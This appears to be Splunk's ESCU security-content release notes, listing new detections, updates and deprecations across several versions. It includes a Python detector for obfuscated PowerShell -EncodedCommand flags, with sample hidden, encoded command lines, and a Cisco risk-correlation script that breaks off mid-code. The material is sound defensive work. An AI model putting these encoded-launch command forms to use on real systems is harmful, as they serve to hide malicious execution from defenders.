Releases: splunk/security_content
v6.0.0
🚀 Key Highlights
ESCU 6.0.0 is a major release that includes a number of changes for better alignment with Enterprise Security v8.x+ features.
Please note that all content has been updated in this release, resulting in cleaner, more readable .conf files.
🔍 Expanded Finding and Intermediate Finding Support 🔎
Detections that previously created Notable Events (and, later, Findings with a 0-score "N/A" entity) will now create a Finding with an appropriately tagged entity taken from the search results, using the score that would previously have been assigned to the risk event/Intermediate Finding for that entity.
Because of the shift to tagging entities to Findings, fewer total Intermediate Findings may be created for some detections, as we won’t be separately creating Intermediate Findings for every entity.
🗓️ Increased Clarity on Content Creation Date vs Modification Date 🗓️
Detections, Analytic Stories, and other content now show (depending on where you view them) both a creation date and a modification date, indicating when we first created them and when we last modified them.
🛠️ Repository Tooling Updates 🛠️
ESCU v6.0 marks the transition away from contentctl. We are shifting future investment from contentctl to Detection Studio as we work to bring this functionality into Splunk as an officially supported capability. The contentctl repository will remain publicly available for reference, forking, and customization, but continued use may require customer-managed customization. For more information, see https://github.com/splunk/contentctl/blob/main/README.md
Future Breaking Changes
As previously communicated in ESCU v5.27.0, a number of detections will be removed in v6.1.0. For details on detections scheduled for removal in ESCU version v6.1.0, see the List of Detections Scheduled for Removal.
List of detections scheduled for removal in ESCU version 6.1.0
| Deprecated Detection | Replacement Detection |
|---|---|
| CHCP Command Execution | Not Available |
| Sc exe Manipulating Windows Services | Not Available |
| Processes launching netsh | Not Available |
| Ivanti Sentry Authentication Bypass | Not Available |
| Attempt To Add Certificate To Untrusted Store | Not Available |
List of detections deprecated in ESCU version 6.0.0
| Deprecated Detection | Replacement Detection |
|---|---|
v5.27.0
🚀 Key Highlights
- 🚨 Linux Copy Fail Privilege Escalation (CVE-2026-31431): Added a new detection: Linux Auditd Copy Fail Privilege Escalation to identify exploitation of the Copy Fail vulnerability, a Linux kernel flaw that enables unprivileged users to perform controlled writes to file page cache and escalate privileges to root. This analytic leverages auditd telemetry to detect suspicious modification patterns targeting setuid binaries, providing early visibility into local privilege escalation attempts across affected Linux systems.
- 🔐 Cisco Secure Access Analytics: Introduced a new analytic story for Cisco Secure Access, leveraging firewall telemetry to detect suspicious access patterns. This release includes updates to existing detections: Large ICMP Traffic, Outbound SMB Traffic, Outbound LDAP Traffic, and Windows RDP Network Brute Force Attempts enabling them to operate with Cisco Secure Access Firewall data, validated through simulated attack scenarios to improve visibility into adversary activity traversing modern cloud-delivered security controls.
- 🪟 Windows Threat Detection Expansion: Significantly expanded coverage across multiple analytic stories with the addition of a broad set of new detections targeting modern Windows attack techniques, including PowerShell abuse, process injection, privilege escalation, registry manipulation, cloud and Azure activity, RMM tool usage, and C2 frameworks such as Cobalt Strike, Metasploit, and custom agents. These analytics enhance visibility into attacker behaviors like defense evasion (EDR bypass, obfuscation, EFI tampering), persistence (scheduled tasks, file association changes, GPO abuse), credential access (LAPS harvesting, keychain-like data access), and lateral movement and exfiltration, while also covering emerging tradecraft such as Cloudflared tunnels, Devtunnels, and supply chain tooling abuse—providing deeper detection across the Windows attack lifecycle.
- ⌨️ VIP Keylogger (.NET Stealer) Detection Coverage: Introduced new analytics to strengthen detection of VIP Keylogger and related .NET-based infostealers by focusing on behavioral indicators of stealthy execution and persistence. New detections: PowerShell Environment Variable Execution, Windows Anomalous Registry Value Length in Environment Key, PowerShell PInvoke Process Injection API Chain, and Windows Proxy Execution of .NET Utilities via Scripts surface patterns such as encoded payload staging in registry keys, script-driven execution of trusted .NET binaries, and in-memory process injection techniques, improving visibility into credential theft operations, obfuscated execution chains, and defense evasion commonly used in modern phishing-delivered stealer campaigns.
New Analytic Story - [2]
New Analytics - [67]
- Linux Auditd Copy Fail Privilege Escalation
- PowerShell Environment Variable Execution
- PowerShell PInvoke Process Injection API Chain
- Windows .Key File Creation in Root Directory
- Windows Anomalous Registry Value Length in Environment Key
- Windows AppCertDLL Modification Via Command Line
- Windows Azure PowerShell Module Installation Via PowerShell Script
- Windows Azure Storage Utility Execution Via CLI
- Windows Cobalt Strike PowerShell Loader
- Windows Command Obfuscation with Environment Variable Substrings
- Windows Computer Account Changed to Domain Controller
- Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script
- Windows CrowdStrike Agent Registry Key Removal
- Windows Crowdstrike RTR Script Execution
- Windows Default Cobalt Strike PowerShell Beacon
- Windows Devtunnels Execution
- Windows Devtunnels Image Loaded
- Windows Downdate Registry Activity
- Windows EDRSilencer Execution
- Windows EFI Bootloader File Modification
- Windows EFI Volume Mount Attempt Via Mountvol
- Windows Entra User Management Via Azure CLI
- Windows File Association Modification via Ftype
- Windows Filtering Platform Policy Added to Block EDR Process
- Windows Get-Variable.EXE Execution from WindowsApps Folder
- Windows GrimResource - MMC Process Accessing APDS DLL
- Windows Guest Account Enabled Via Net.EXE
- Windows IOBit Unlocker Extension DLL Registration via Regsvr32
- Windows LAPS Password Gathering Via PowerShell Script
- Windows Level RMM PowerShell Script Installer
- Windows Level RMM Watchdog Task Created
- Windows MSI Rollback Script Deleted By Non-Msiexec Process
- Windows Metasploit Confluence Plugin Execution
- Windows Mock Trusted Directory MSC File Creation
- Windows Mustang Panda USB Tool Execution
- Windows Netspy Network Scanner Execution
- Windows Network Connection From Program In Suspect Location
- Windows NorthStar C2 Agent Execution
- Windows OneDrive Share Mounted via Net
- Windows Potato Privilege Escalation Tool Execution
- Windows Potential Cloudflared Network Connection
- Windows Potential Cloudflared Tunnel Execution
- Windows Potential Web Shell Creation For VMware Workspace ONE
- Windows PowGoop Beacon Decoding
- Windows PowerShell Module File Created
- Windows PowerShell Script TabExpansion Direct Call
- Windows Privilege Escalation Attempt Via MSI Rollback
- Windows Process Accessing Windows Recall Directory
- Windows Proxy Execution of .NET Utilities via Scripts
- Windows PuTTY Suite Utility Execution
- Windows RMM Tool Execution
- Windows Remote Image Load
- Windows Scheduled Task Created in a Group Policy Object
- Windows Set Custom DNS ServerLevelPlugin Via Dnscmd
- [Windows Shell or Script Execution From IIS Directory](https...
v5.26.0
🚀 Key Highlights
- 🍎 macOS Detection Coverage Expansion: Expanded detection coverage for macOS environments with three new analytic stories - macOS Persistence Techniques, macOS Post-Exploitation, and macOS Privilege Escalation - delivering visibility across the full attack lifecycle. This release introduces detections for behaviors such as account creation, Gatekeeper bypass, keychain dumping, LoginHook persistence, kextload abuse, hidden files/directories, log removal, data chunking, network share discovery, and firewall rule enumeration, strengthening defense against stealthy macOS threats and improving monitoring of attacker activity on Apple endpoints.
- ⛓️ Axios Supply Chain Post-Compromise Activity: Expanded detection coverage for Axios-related supply chain post-compromise scenarios by tagging existing analytics that capture behaviors associated with malicious package execution and downstream abuse. This update improves visibility into post-installation script execution, credential access, data exfiltration, and persistence mechanisms often triggered after a compromised dependency is introduced, helping defenders detect and respond to supply chain attacks impacting JavaScript and Node.js ecosystems.
New Analytic Story - [4]
- Axios Supply Chain Post Compromise
- MacOS Persistence Techniques
- MacOS Post-Exploitation
- MacOS Privilege Escalation
New Analytics - [11]
- MacOS Account Created
- MacOS Data Chunking
- MacOS Gatekeeper Bypass
- MacOS Hidden Files and Directories
- MacOS Kextload Usage
- MacOS Keychains Dumped
- MacOS List Firewall Rules (Internal Contributor: Jamie Windley)
- MacOS Log Removal
- MacOS LoginHook Persistence
- MacOS Network Share Discovery
- Microsoft Intune Bulk Wipe (External Contributor: jakeenea51)
Other Updates
- Fixed a bug in the Onboarding Assistant that affected Splunk Cloud customers using instances configured on ports (other than 8000). In these cases, detections within an analytic story failed to enable correctly or behaved inconsistently. This issue has been resolved, and detections can now be enabled successfully.
- Updated all "View risk events for the last 7 days" drilldown searches to reflect the correct earliest and latest time configuration.
- Improved detection coverage and accuracy across multiple rules by fixing regex issues, refining conditions, adding macro usage, and reducing false positives. To view the detailed list of updates and the associated Github issues, please view the details in this pull request.
- Removed missing fields from the Windows Event Log Cleared detection (External Contributor: AndreiBanaru).
Breaking Changes
As previously communicated in the ESCU v5.24.0 release, several detections have been removed. For a complete list of the detections removed in version v5.26.0, refer to the List of Removed Detections. Users are expected to transition to the recommended replacements where applicable. Additionally, a new set of detections has been deprecated. For details on detections scheduled for removal in ESCU version v6.1.0, see the List of Detections Scheduled for Removal.
v5.25.1
🩹 Patch Notes
ESCU 5.25.1 is a patch release that remediates a bug introduced in ESCU 5.25.0, which has been pulled from GitHub and Splunkbase.
In ESCU v5.25.0, the Detection Windows Security Support Provider Reg Query had its "version" bumped despite the detection being unchanged. This could lead to errors and failures during the Enterprise Security Content Versioning process.
Please note that this is a separate and unrelated issue from the known Detection Versioning issue SECHELP-341 in Enterprise Security 8.3, 8.4, and 8.5.
Since the ESCU 5.25.0 Release has been pulled from Splunkbase and GitHub, the ESCU 5.25.0 Release Notes have been reproduced below.
🚀 ESCU 5.25.0 Key Highlights
- Ghost RAT: Expanded coverage for Ghost RAT activity by tagging multiple existing analytics related to service creation, registry persistence, command-line execution, and system discovery behaviors, alongside new detections for Windows Remote Access Registry Entry and Windows Rundll32 with Non-Standard File Extension. Additionally, improved detection fidelity with updates to Ping Sleep Batch Command and introduced a new analytic story Ghost RAT, enhancing visibility into stealthy persistence, defense evasion, and command execution techniques commonly used by this malware family.
- Void Manticore Activity Coverage Expansion: Expanded detection coverage for Void Manticore, a threat group associated with destructive and espionage-driven operations, by tagging multiple existing analytics aligned to data destruction, shadow copy deletion, backup recovery tampering, and suspicious script execution behaviors. This update enhances visibility into attacker tradecraft involving bcdedit manipulation, recursive file deletion, remote process execution via WMI, and suspicious process/file activity, improving detection of pre-impact and impact-stage techniques commonly used in disruptive campaigns targeting enterprise environments.
- Detection & Content Improvements: Introduced new data source support, migrated Palo Alto integrations, enhanced detections with MITRE mappings, fixed regex and logic issues, reduced false positives, improved accuracy and performance, updated metadata based on telemetry insights, and refactored multiple analytics and SPL queries for better readability, consistency, and reliability.
New Analytic Story - [2]
New Analytics - [2]
- Windows Routing and Remote Access Service Registry Key Change
- Windows Rundll32 with Non-Standard File Extension
Updated Analytics
Based on various telemetry sources, we have updated a list of detections that were missing MITRE IDs, and updated data sources and detections with the following changes:
- Malicious PowerShell Process - Encoded Command - Replaced the broken regex with a more robust one that aims to detect most variations of the EncodedCommand flag (see [BUG] Malicious PowerShell Process - Encoded Command - regex doesn't make sense #3939).
- Outbound Network Connection from Java Using Default Ports - Removed the duplicate entry for javaw.exe and made other updates to the SPL structure so that it is more readable.
- Suspicious Rundll32 no Command Line Arguments - Removed the unnecessary use of regex and moved the filter logic earlier for better performance.
- Suspicious SearchProtocolHost no Command Line Arguments - Removed the unnecessary use of regex and moved the filter logic earlier for better performance.
- Windows New Deny Permission Set On Service SD Via Sc.EXE - Updated metadata info, including the FP section, based on Athena telemetry.
- Windows New Service Security Descriptor Set Via Sc.EXE - Updated metadata info, including the FP section, based on Athena telemetry.
- Detect Large ICMP Traffic / Detect Outbound LDAP Traffic - Updated the logic of both by adding a broader filter for local IPs.
- Detect Computer Changed with Anonymous Account - Updated the logic to be more accurate. (See the explanation in [BUG] Logic Problem in Detect Computer Changed with Anonymous Account #3961.)
- Windows Privileged Group Modification - Updated the logic to include EventID 4756 (fixes Add Event ID 4756 to windows_privileged_group_modification detection #3969).
- Windows Scheduled Task Service Spawned Shell - Updated and beautified the SPL as well as other metadata and RBA-related config.
- Possible Lateral Movement PowerShell Spawn - Fixed an FP by adding an exclusion for svchost running the Schedule service.
- Detect Use of cmd exe to Launch Script Interpreters - Fixed an FP by adding an exclusion for standard executable file paths.
- Scheduled Task Deleted Or Created via CMD - Fixed an FP by adding an exclusion for standard executable file paths.
- Beautified the SPL of multiple analytics that were leveraging the Palo Alto TA.
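The regex fix for Malicious PowerShell Process - Encoded Command hinges on PowerShell accepting any unambiguous prefix of -EncodedCommand, not just the full flag name. The Python below is an added illustration, not ESCU's SPL or its actual regex: it builds a matcher for those prefixes plus the documented -e/-ec aliases, decodes the UTF-16LE payload, and runs over constructed command lines.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand as well as the
# documented aliases -e and -ec, so matching only the full flag name misses
# the short forms. Build every prefix from "en" upward plus the two aliases,
# longest first so the alternation prefers the longest hit.
_FULL_FLAG = "encodedcommand"
_FLAG_VARIANTS = sorted(
    {"e", "ec"} | {_FULL_FLAG[:i] for i in range(2, len(_FULL_FLAG) + 1)},
    key=len, reverse=True,
)

# The flag may be introduced by "-", "/" or a Unicode en/em dash (which
# PowerShell also tolerates), and the value may be quoted. Base64 of a
# UTF-16LE script is at least 4 characters with up to two "=" padding chars.
_ENCODED_RE = re.compile(
    r"(?<![\w-])[-/\u2013\u2014](" + "|".join(_FLAG_VARIANTS) + r")\b\s+"
    r"['\"]?([A-Za-z0-9+/]{4,}={0,2})",
    re.IGNORECASE,
)


def detect_encoded_command(cmdline: str) -> Optional[dict]:
    """Return {"flag", "payload", "decoded"} if cmdline carries an
    EncodedCommand variant, else None. "decoded" is None when the payload
    is not valid base64/UTF-16LE (the flag alone is still worth a hit)."""
    m = _ENCODED_RE.search(cmdline)
    if not m:
        return None
    flag, payload = m.group(1), m.group(2)
    decoded: Optional[str] = None
    try:
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4), validate=True)
        decoded = raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        pass
    return {"flag": flag, "payload": payload, "decoded": decoded}


def scan_cmdlines(cmdlines):
    """Run the matcher over a batch of process command lines and return the hits."""
    hits = []
    for line in cmdlines:
        result = detect_encoded_command(line)
        if result is not None:
            hits.append({"cmdline": line, **result})
    return hits


# Constructed sample command lines; "SQBFAFgA" is base64 of "IEX" in UTF-16LE.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -e SQBFAFgA",                  # shortest alias
    'powershell.exe -nop -ec "SQBFAFgA"',                        # documented alias, quoted
    "pwsh /EncodedC SQBFAFgA",                                    # partial prefix, slash syntax
    "powershell.exe \u2013enc SQBFAFgA",                          # en dash instead of hyphen
    "powershell.exe -enc QUJD",                                   # flag present, payload not UTF-16LE
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",  # benign
    'powershell.exe -Command "Write-Host encodedcommand"',       # benign: word without a flag prefix
]

if __name__ == "__main__":
    for hit in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"flag=-{hit['flag']:<14} decoded={hit['decoded']!r}  <- {hit['cmdline']}")
```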
v5.24.0
🚀 Key Highlights
- Cisco SD-WAN Analytics: Expanded coverage for Cisco SD-WAN environments with new analytics targeting exploitation and anomalous traffic patterns, including detections for Cisco SD-WAN Arbitrary File Overwrite Exploitation Activity and Cisco SD-WAN Uncommon User-Agent Multi-URI Activity, improving visibility into potential exploitation attempts and suspicious HTTP behaviors indicative of adversary interaction with SD-WAN infrastructure.
- BlankGrabber Stealer and Muddy Water Analytics: Expanded detection coverage for BlankGrabber, a Windows-based information stealer used to harvest browser credentials, cryptocurrency wallets, and authentication tokens, by tagging existing analytics and introducing new detections focused on browser data access, suspicious registry queries, WMI reconnaissance, and defense evasion behaviors such as PowerShell exclusion tampering. This update enhances visibility into credential harvesting, data staging, and stealthy exfiltration activity commonly associated with phishing-delivered stealers and cracked software infections, helping defenders detect and respond to early-stage compromise before widespread account takeover or financial theft occurs.
- Lotus Blossom (Chrysalis Backdoor) Supply Chain Attack: Added new detection coverage for the Lotus Blossom (Billbug) APT group's Chrysalis backdoor campaign, which leveraged a Notepad++ supply chain compromise (June–December 2025) to target government, financial, and IT sectors. This release introduces detections for Bitdefender DLL sideloading abuse, BluetoothService-based persistence, and TinyCC shellcode execution, along with tagging existing analytics for system and user discovery behaviors observed across multiple infection chains. These updates improve visibility into stealthy execution, persistence mechanisms, and post-compromise reconnaissance associated with sophisticated supply chain intrusions and staged payload delivery.
- Standardized Risk Scoring Across Detections: Implemented consistent risk scoring across all analytics by assigning a score of 50 for TTP detections and 20 for anomaly-based detections, improving prioritization, correlation, and alert triage across detection workflows.
New Analytic Story - [4]
Updated Analytic Story - [1]
New Analytics - [14]
- Cisco SD-WAN - Arbitrary File Overwrite Exploitation Activity
- Cisco SD-WAN - Uncommon User-Agent Multi-URI Activity
- Linux Auditd AI CLI Permission Override Activated
- Linux Docker Root Directory Mount
- Linux Docker Shell Execution
- Windows Bluetooth Service Installed From Uncommon Location
- Windows Excel Spawning Microsoft Project Application
- Windows Hosts File Access
- Windows MpCmdRun RemoveDefinitions Execution
- Windows Product Key Registry Query
- Windows Rundll32 Execution With Log.DLL
- Windows TinyCC Shellcode Execution
- Windows WMI Reconnaissance Class Query
- Windows WinRAR Launched Outside Default Installation Directory
Updated Analytics - [1655]
- 3CX Supply Chain Attack Network Indicators
- ASL AWS Concurrent Sessions From Different Ips
- ASL AWS Create Policy Version to allow all resources
- ASL AWS Credential Access GetPasswordData
- ASL AWS Credential Access RDS Password reset
- ASL AWS Defense Evasion Delete CloudWatch Log Group
- ASL AWS Defense Evasion Delete Cloudtrail
- ASL AWS Defense Evasion Stop Logging Cloudtrail
- ASL AWS Defense Evasion Update Cloudtrail
- ASL AWS Detect Users creating keys with encrypt policy without MFA
- ASL AWS Disable Bucket Versioning
- ASL AWS EC2 Snapshot Shared Externally
- ASL AWS ECR Container Upload Outside Business Hours
- ASL AWS ECR Container Upload Unknown User
- ASL AWS IAM AccessDenied Discovery Events
- ASL AWS IAM Assume Role Policy Brute Force
- ASL AWS IAM Failure Group Deletion
- ASL AWS Multi-Factor Authentication Disabled
- ASL AWS Network Access Control List Created with All Open Ports
- ASL AWS Network Access Control List Deleted
- ASL AWS New MFA Method Registered For User
- ASL AWS SAML Update identity provider
- ASL AWS UpdateLoginProfile
- AWS AMI Attribute Modification for Exfiltration
- AWS Bedrock Delete GuardRails
- AWS Bedrock Delete Knowledge Base
- AWS Bedrock Delete Model Invocation Logging Configuration
- AWS Bedrock High Number List Foundation Model Failures
- AWS Bedrock Invoke Model Access Denied
- AWS Concurrent Sessions From Different Ips
- AWS Console Login Failed During MFA Challenge
- AWS Create Policy Version to allow all resources
- AWS CreateLoginProfile
- AWS Credential Access Failed Login
- AWS Credential Access GetPasswordData
- AWS Credential Access RDS Password reset
- AWS Defense Evasion Delete CloudWatch Log Group
- AWS Defense Evasion Delete Cloudtrail
- AWS Defense Evasion Impair Security Services
- AWS Defense Evasion Stop Logging Cloudtrail
- AWS Defense Evasion Update Cloudtrail
- AWS Detect Users creating keys with encrypt policy without MFA
- AWS Detect Users with KMS keys performing encryption S3
- AWS Disable Bucket Versioning
- AWS EC2 Snapshot Shared Externally
- [AWS ECR Conta...
v5.23.0
🚀 Key Highlights
- 🤖 Cisco Catalyst SD-WAN Analytics: Introduced a new analytic story for Cisco Catalyst SD-WAN focused on identifying anomalous control-plane relationships across vManage, vSmart, and edge devices. By leveraging telemetry related to control-connection state changes, peer identity, public IP associations, and system roles, this release detects rare or unexpected peer interactions that may signal misconfigurations, unauthorized infrastructure, or adversary presence within SD-WAN environments. New detections — Cisco SD-WAN Low Frequency Rogue Peer and Cisco SD-WAN Peering Activity — provide visibility into suspicious control-plane communications and abnormal peering patterns that deviate from established network baselines.
New Analytic Story - [1]
New Analytics - [3]
- Cisco SD-WAN - Low Frequency Rogue Peer
- Cisco SD-WAN - Peering Activity
- Curl Execution with Percent Encoded URL
Other Updates
- Added end-to-end YAML formatting/validation (yamlfmt + yamllint) via a new pre-commit hook and a CI “YAML Validation” job (validate_yaml.py), updated the docs, and auto-formatted all detections/analytics (including initial SPL beautification using |- for readability).
- Updated multiple detections to better cover calc-related binaries by adding CalculatorApp.exe/win32calc.exe entries, fixed a LOLBAS network-traffic filter bug (All_Traffic.dest_ip), and enhanced the calc DLL side-loading rule metadata (including explicit WindowsCodecs.dll) to address issue #3916.
v5.22.0
🚀 Key Highlights
- 🤖 Suspicious MCP Activities: Introduced a new analytic story focused on detecting abuse of authorized Model Context Protocol (MCP) server deployments, where legitimate AI tool integrations (filesystem, database, API, and cloud operations) may be weaponized for data exfiltration, privilege escalation, lateral movement, or persistence. This release includes a new MCP Technology Add-on (TA) for parsing MCP server telemetry and adds detections such as MCP Sensitive System File Search, MCP Prompt Injection, MCP Postgres Suspicious Query, MCP GitHub Suspicious Operation, and MCP Filesystem Server Suspicious Extension Write, providing visibility into malicious tool invocation patterns, abnormal data access, and AI-driven attack chains leveraging trusted automation infrastructure.
- 💥 DynoWiper and ZOVWiper (Sandworm Destructive Operations): Expanded coverage for the destructive malware families DynoWiper and ZOVWiper, attributed to the Russia-aligned threat group Sandworm, by tagging existing endpoint analytics aligned to their file-overwrite, drive enumeration, and system reboot behaviors. These wipers target critical infrastructure and financial sectors, systematically overwriting data across fixed and removable drives while selectively skipping system directories to maximize operational impact. By mapping current detections to known Sandworm tradecraft, this update strengthens visibility into destructive file modification patterns, large-scale overwrite activity, and pre-reboot execution behaviors associated with modern wiper deployments.
- ☀️ SolarWinds Web Help Desk RCE (CVE-2025-26399) Post-Exploitation: Tagged existing analytics to enhance visibility into post-exploitation activity following SolarWinds WHD remote code execution, focusing on suspicious process spawning, privilege escalation, lateral movement, persistence mechanisms, and outbound command-and-control behavior originating from compromised Web Help Desk services.
New Analytic Story - [5]
New Analytics - [7]
- MCP Filesystem Server Suspicious Extension Write
- MCP Github Suspicious Operation
- MCP Postgres Suspicious Query
- MCP Prompt Injection
- MCP Sensitive System File Search
- Windows Execution of Microsoft MSC File In Suspicious Path
- Windows MMC Loaded Script Engine DLL
Updated Analytics
- CrowdStrike Falcon Stream Alerts (External Contributor: @bpluta-splunk)
Breaking Changes
As previously communicated in the ESCU v5.20.0 release, several detections have been removed. For a complete list of the detections removed in version v5.22.0, refer to the List of Removed Detections. Users are expected to transition to the recommended replacements where applicable. Additionally, a new set of detections has been deprecated. For details on detections scheduled for removal in ESCU version v5.24.0, see the List of Detections Scheduled for Removal.
| Removed Detection | Replacement Detection |
|---|---|
| Cobalt Strike Named Pipes | Windows Suspicious C2 Named Pipe |
| HTTP Suspicious Tool User Agent | HTTP Scripting Tool User Agent |
v5.21.0
🚀 Key Highlights
- 🔍 New Finding-Based Detections (ES 8.4+): Starting with Splunk Enterprise Security 8.4 and above, ESCU introduces Finding-Based Detections, a new analytic type that automatically groups and correlates high volumes of related findings and intermediate findings at the entity level. This reduces alert noise and helps analysts quickly focus on the users or hosts most likely to represent real threats.
- 🛡️ GNU Telnetd CVE-2026-24061 Authentication Bypass: Introduced a new analytic story covering CVE-2026-24061, a critical authentication bypass vulnerability in GNU InetUtils telnetd that allows unauthenticated attackers to establish a Telnet session as root. This flaw abuses an unsanitized, attacker-controlled USER environment variable passed to the login process, enabling direct privilege escalation without valid credentials. Added a new detection — Linux Telnet Authentication Bypass — to identify exploitation attempts targeting legacy Unix/Linux systems, embedded devices, network appliances, and operational technology environments where Telnet remains in use.
- 🌐 Windows Chromium Browser Hijacking Enhancements: Expanded browser hijacking coverage with new endpoint detections targeting suspicious Chromium-based browser execution patterns on Windows. Added analytics to identify browsers launched with abnormally small window sizes, disabled popup blocking, disabled logging, suppressed extensions, and headless execution — behaviors commonly associated with ad fraud, credential harvesting, session hijacking, and stealthy user interaction abuse. These detections improve visibility into malicious browser manipulation used by infostealers, loaders, and post-exploitation frameworks.
- 🎯 Expanded Threat Actor and Malware Coverage (VoidLink, Storm-0501, StealC): Tagged a broad set of existing analytics and improved detection coverage for several high-impact threats. Added comprehensive coverage for VoidLink, a cloud-native Linux malware framework leveraging a modular C2 architecture, rootkit functionality, and advanced evasion techniques to target containerized and cloud environments. Additionally, enhanced analytic stories and tagging for Storm-0501 ransomware activity and the StealC stealer, improving visibility into ransomware execution chains, credential theft, downloader behavior, and post-compromise persistence across Windows and Linux environments.
Total New and Updated Content: [419]
New Analytic Story - [4]
Updated Analytic Story - [6]
- Apache Struts Vulnerability
- Brand Monitoring
- Critical Alerts
- JBoss Vulnerability
- Malicious PowerShell
- Scattered Spider
Updated Analytics - [6]
- O365 New MFA Method Registered (External Contributor - @JTweet)
- Set Default PowerShell Execution Policy To Unrestricted or Bypass (External Contributor - @AndreiBanaru)
- Windows Abused Web Services (External Contributor - @aaaAlexanderaaa)
- Services LOLBAS Execution Process Spawn (External Contributor - @DipsyTipsy)
Breaking Changes
- Removed the notable alert action from the following detection, meaning it will no longer create notables/findings but will continue to create risk events (intermediate findings):
  a. Process Creating LNK file in Suspicious Location
Other Updates
- Updated several analytics and significantly improved performance and efficiency across multiple detections by optimizing search logic (e.g., subsearches, targeted where clauses, and reduced search space), resulting in substantial runtime reductions and clearer user guidance where applicable. Pull request for specific details (#1 and #2)
- Updated analytics to have standardized known false positive sections and filter macros at the end of all searches.
- We received reports from a number of customers whereby Removed Searches may still be scheduled to run and their execution would fail silently. However, these searches could not be disabled because they failed to render in the Saved Searches UI. This release includes a fix to savedsearches.conf which ensures that Removed Content still appears in the SavedSearches UI if it had previously been scheduled or modified, allowing these searches to be disabled.
v5.20.0
🚀 Key Highlights
-
🌐 Browser Hijacking:
Introduced a new set of detections focused on browser hijacking techniques that manipulate Chrome configurations, registry settings, and command-line behaviors to persist malicious control, disable updates, and load unauthorized extensions. These detections surface suspicious actions such as disabling Chrome auto-updates, allowlisting or force-loading extensions, and abusing command-line flags to bypass browser security controls. Together, they help security teams identify early indicators of browser compromise, policy tampering, and user-impacting persistence mechanisms commonly leveraged by modern malware. -
☸️ Cisco Isovalent Suspicious Activity:
Expanded detection coverage leveraging Cisco Isovalent's kernel-level eBPF telemetry to identify advanced threats targeting Kubernetes and cloud-native environments. New detections focus on high-risk behaviors such as access to cloud metadata services, suspicious process execution, container escape techniques, offensive tooling in pods, anomalous kprobe activity, and unexpected shell or network behavior. By correlating low-level runtime signals with rich Kubernetes context, this content enables early detection of in-cluster attacks, lateral movement, and workload compromise before adversaries can escalate or persist. -
🕵️ Suspicious User Agents:
Introduced enhanced detection coverage to identify suspicious and default user agent strings commonly used by malware, command-and-control frameworks, remote monitoring and management (RMM) tools, and other potentially unwanted applications. These detections focus on uncovering overlooked or hard-coded user agents frequently left unchanged by adversaries, providing network-level visibility into malicious tooling that blends into normal HTTP traffic. By correlating anomalous user agents across malware, C2 frameworks, PUAs, and RMM software, security teams can more quickly identify and investigate stealthy network activity. -
🤖 SesameOp & PromptFlux:
Expanded analytic coverage for emerging malware families that abuse legitimate AI service APIs as command-and-control channels, allowing adversaries to hide malicious activity within trusted cloud traffic. This update tags relevant existing detections and introduces a new detection for Windows Potential AppDomainManager Hijack Artifacts Creation, addressing key persistence and injection techniques leveraged by SesameOp and PromptFlux. Together, these detections help surface anomalous API usage, suspicious persistence artifacts, and post-exploitation behaviors that indicate covert C2 activity masquerading as normal AI service interactions. -
🔐 Cisco IOS & Secure Firewall Privileged Activity:
Added new detections and risk-based correlation searches to identify high-risk administrative activity targeting Cisco IOS and Cisco Secure Firewall devices. The new detections focus on privileged command execution over HTTP and anomalous SSH behavior, including connections to non-standard ports and suspicious SSH services. These signals are correlated using the Risk data model to surface higher-fidelity alerts for privileged account creation combined with suspicious HTTP or SSH activity, helping teams identify post-exploitation and persistence attempts on network edge infrastructure.
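The risk-based correlation described above can be illustrated with the following added example (not ESCU's correlation search): per-device risk events are grouped, and a privileged account creation only becomes a finding when the same device also shows suspicious SSH or HTTP activity within a time window, with the finding carrying the summed risk score. The event schema (device, rule, score, time, user) and the events are constructed; "Privileged Account Created" is a stand-in name for whichever account-creation detection fires, while the SSH and HTTP rule names are the detections listed in this release.

```python
"""Risk-based correlation over constructed per-device risk events.

Added example for this release note, not ESCU's correlation search. The
event schema and events are constructed; "Privileged Account Created"
is a stand-in rule name.
"""
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT_RULES = {"Privileged Account Created"}  # constructed stand-in name
SSH_RULES = {
    "Cisco Secure Firewall - SSH Connection to Non-Standard Port",
    "Cisco Secure Firewall - SSH Connection to sshd_operns",
}
HTTP_RULES = {"Cisco Secure Firewall - Privileged Command Execution via HTTP"}
WINDOW = timedelta(hours=24)


def _ev(device, rule, score, time, user=None):
    """Build one constructed risk event."""
    return {"device": device, "rule": rule, "score": score,
            "time": datetime.fromisoformat(time), "user": user}


# Constructed risk events, as a search over the Risk data model would return them
SAMPLE_EVENTS = [
    _ev("fw-edge-01", "Privileged Account Created", 40, "2025-12-01T09:00:00", "svc_backup"),
    _ev("fw-edge-01", "Cisco Secure Firewall - SSH Connection to Non-Standard Port", 25, "2025-12-01T09:15:00"),
    _ev("fw-edge-01", "Cisco Secure Firewall - SSH Connection to sshd_operns", 30, "2025-12-01T09:20:00"),
    # account creation alone: routine admin work, no finding
    _ev("fw-edge-02", "Privileged Account Created", 40, "2025-12-01T08:00:00", "ops_admin"),
    # HTTP command execution 11 days after the creation: outside the window
    _ev("fw-edge-03", "Privileged Account Created", 40, "2025-11-20T08:00:00", "vendor"),
    _ev("fw-edge-03", "Cisco Secure Firewall - Privileged Command Execution via HTTP", 35, "2025-12-01T08:00:00"),
    # suspicious SSH without an account creation: stays an intermediate finding
    _ev("fw-edge-04", "Cisco Secure Firewall - SSH Connection to Non-Standard Port", 25, "2025-12-01T11:00:00"),
]


def correlate(events, window=WINDOW):
    """Return one finding per account creation that has suspicious SSH or
    HTTP activity on the same device within +/- window of it."""
    by_device = defaultdict(list)
    for ev in events:
        by_device[ev["device"]].append(ev)

    findings = []
    for device, evs in sorted(by_device.items()):
        evs.sort(key=lambda e: e["time"])
        for anchor in (e for e in evs if e["rule"] in ACCOUNT_RULES):
            lo, hi = anchor["time"] - window, anchor["time"] + window
            nearby = [e for e in evs if e is not anchor and lo <= e["time"] <= hi]
            ssh = [e for e in nearby if e["rule"] in SSH_RULES]
            http = [e for e in nearby if e["rule"] in HTTP_RULES]
            if not ssh and not http:
                continue
            supporting = ssh + http
            findings.append({
                "device": device,
                "user": anchor["user"],
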